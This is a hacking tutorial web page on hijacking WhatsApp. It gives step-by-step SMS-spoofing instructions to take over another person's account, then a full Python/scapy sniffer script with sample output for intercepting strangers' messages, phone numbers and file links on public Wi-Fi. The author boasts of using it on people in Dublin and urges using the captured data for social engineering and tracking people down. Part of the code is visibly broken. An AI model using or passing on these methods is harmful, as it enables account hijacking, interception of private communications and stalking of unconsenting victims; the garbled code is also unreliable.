How to hack WhatsApp Messenger on Nokia, iPhone & Android

WhatsApp is a cross-platform messing application used by smartphones. It allows users to communicate instant messages and share media via 3G or WiFi with other users on the platform. Back in may 2011 WhatsApp had a security breach when hackers realized that messages were being transmitted unencrypted via plain text which left accounts open for hi-jacking. WhatsApp finally released a security update for this problem and the system became locked down.

REQUIREMENTS:

7Zip – Click here to download
A Windows Computer (Windows XP, Vista, Win 7, Win 8)
A Phone running WhatsApp (iPhone, Android, Nokia, Blackberry etc)


Please upgrade your browser

In this article i will talk about alternative methods of hi-jacking WhatsApp messages and other protocols using a variety of methods.

The first hack im going to talk about will spoof WhatsApp and have it think you are somebody else allowing you to communicate under an alternative name. This hack works by tricking the WhatsApp Verification Servers by sending a spoofed request for an authorisation code intended for an alternative phone. This method is also known to work on several other IM applications based on iOS, Symbian & Android devices.

Hack 1

Install WhatsApp on your device
WhatsApp now starts a counter where it sends a verification message to its servers. If this verification fails after a specific time then WhatsApp offers alternative methods of verification. A message can be blocked by changing the message center number or pushing the phone into Airplane mode.
WhatsApp now offers an alternative method of verification
Choose verify through SMS and fill in your email address. Once you click to send the SMS click cancel to terminate the call for authorisation to the WhatsApp server.
Next we need to do some SMS-Spoofing
There are numerous ways of doing this for free. A quick google search will pull up a vast amount of services which can spoof email addresses.

If you are using an iPhone use the following details in the SMS spoofer application.

To: +447900347295
From: +(Country code)(mobile number)
Message: (your email address)

If you are using another device then check your outbox and copy the message details into the spoofer application and send the spoofed verification.

You will now receive messages intended for the spoofed number on your mobile device and you can communicate with people under the spoofed number.

Hack 2

The second attack I’m going to talk about is a little bit more professional. For users who can pull of MITM (Man in the Middle) Attacks this is a sure way to rake in data from a public network. I came across the script at the 0×80 blog so i I tried it on several public networks in Dublin (thanks to the karma code). The amount of data you can pull in from people sitting around you in a short amount of time is quite unreal. The code is written in Python so its nice and simple to work with and edit to make it work for similar chat applications.
You will also need to parse the traffic so check this link: http://www.secdev.org/projects/scapy/
Before you have a look at the code you may want to note that WhatsApp blurts out even more information for us to see. Doing a MITM Attack and peeking at the packets we can see that WhatsApp prints the mobile number and the name of the user your target is speaking with. This is important to note this because this data can be used for some social engineering (calling the person to pull more information from them) or by checking web resources such as Facebook or LinkedIn to find their address, email accounts, websites and what ever else your hunting for.

Example

DYN:~/whatsapp# python sniffer.py wlan0

#########################
## whatsapp sniff v0.1 ##
#########################

[+] Interface : wlan0
[+] filter : tcp port 5222

To : ***********
Msg : Hello, I will send you a file.

To : **********
Filename : .jpg
URL : https://mms*.whatsapp.net/a1/0/1/2/3/*md5hash*.jpg

From : ***********
Msg : Thanks file has been recieved, take this file too.

From : ***********
Filename : .jpg
URL : https://mms*.whatsapp.net/a2/0/2/3/1/*md5hash*.jpg

Code

#!/usr/bin/env python

import os
import sys
import scapy.all
import re

Previous_Msg = ""
Previous_Filename = ""
Files = []
Messages = []
Urls = []

def banner():
 print "#########################"
 print "## whatsapp sniff v0.1 ##"
 print "## qnix@0x80.org ##"
 print "#########################\n"

def whatsapp_parse(packet):
 global Previous_Msg
 global Previous_Filename
 global Files
 global Messages
 global Urls
 src = packet.sprintf("%IP.src%")
 dst = packet.sprintf("%IP.dst%")
 sport = packet.sprintf("%IP.sport%")
 dport = packet.sprintf("%IP.dport%")
 raw = packet.sprintf("%Raw.load%")

 # Target Sending stuff
 if dport == "5222":
 Filename = ""
 toNumber = ""
 Url = ""
 Msg = ""
 try:
 toNumber = re.sub("\D", "", raw)
 if(toNumber[5:16].startswith("0")): toNumber = toNumber[6:17]
 else: toNumber = toNumber[5:16]
 try:
 Filename = raw.split("file\\xfc")[1][1:37]
 Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
 except:pass
 try: Msg = raw.split("\\xf8\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
 except:pass
 except: pass
 if(len(toNumber) >= 10):
 if(len(Msg) >= 1 and Previous_Msg != Msg):
 Previous_Msg = Msg
 print "To : ", toNumber
 print "Msg : ", Msg
 Messages.append(Msg)
 elif(len(Filename) >= 1 and Previous_Filename != Filename):
 Previous_Filename = Filename
 print "To : ", toNumber
 print "Filename : ", Filename
 print "URL : ", Url
 Files.append(Filename)
 Urls.append(Url)

 # Recieved Messages
 if sport == "5222":
 Msg = ""
 fromNumber = ""
 Url = ""
 Filename = ""
 try:
 fromNumber = re.sub("\D", "", raw)
 if(fromNumber[5:16].startswith("0")): fromNumber = fromNumber[6:17]
 else: fromNumber = fromNumber[5:16]
 try:
 Filename = raw.split("file\\xfc")[1][1:37]
 Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
 except: pass
 try: Msg = raw.split("\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
 except: pass
 except:pass
 if(len(fromNumber) = 1 and Previous_Msg != Msg):
 Previous_Msg = Msg
 print "From : ", fromNumber
 print "Msg : ", Msg
 Messages.append(Msg)
 elif(len(Filename) >= 1 and Previous_Filename != Filename):
 Previous_Filename = Filename
 print "From : ", fromNumber
 print "Filename : ", Filename
 print "URL : ", Url
 Files.append(Filename)
 Urls.append(Url)
def callback(packet):
 sport = packet.sprintf("%IP.sport%")
 dport = packet.sprintf("%IP.dport%")
 raw = packet.sprintf("%Raw.load%")
 if raw != '??':
 if dport == "5222" or sport == "5222":
 whatsapp_parse(packet)

def main():
 banner()
 if(len(sys.argv) != 2):
 print "%s " % sys.argv[0]
 sys.exit(1)
 scapy.iface = sys.argv[1]
 scapy.verb = 0
 scapy.promisc = 0
 expr = "tcp port 5222"

 print "[+] Interface : ", scapy.iface
 print "[+] filter : ", expr
 scapy.all.sniff(filter=expr, prn=callback, store=0)

 print "[+] iface %s" % scapy.iface

if __name__ == "__main__":
 main()